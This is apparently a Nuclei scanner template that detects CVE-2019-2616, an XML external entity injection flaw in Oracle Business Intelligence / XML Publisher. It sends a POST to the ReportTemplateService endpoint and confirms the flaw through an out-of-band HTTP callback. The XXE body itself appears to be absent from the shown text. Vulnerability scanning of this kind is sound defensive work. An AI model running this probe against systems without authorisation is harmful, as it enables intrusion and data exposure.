id: CVE-2019-2616 info: name: XXE in Oracle Business Intelligence and XML Publisher author: pdteam severity: high description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection reference: | - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob requests: - raw: - | POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 76 Content-Type: text/xml; charset=UTF-8 matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"